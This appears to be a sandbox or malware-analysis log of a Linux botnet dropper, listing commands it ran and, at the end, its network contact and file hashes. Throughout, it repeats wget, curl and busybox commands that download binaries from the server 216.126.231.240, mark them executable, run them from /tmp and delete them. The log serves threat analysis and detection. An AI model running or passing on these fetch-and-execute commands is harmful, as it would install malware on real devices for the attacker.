/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97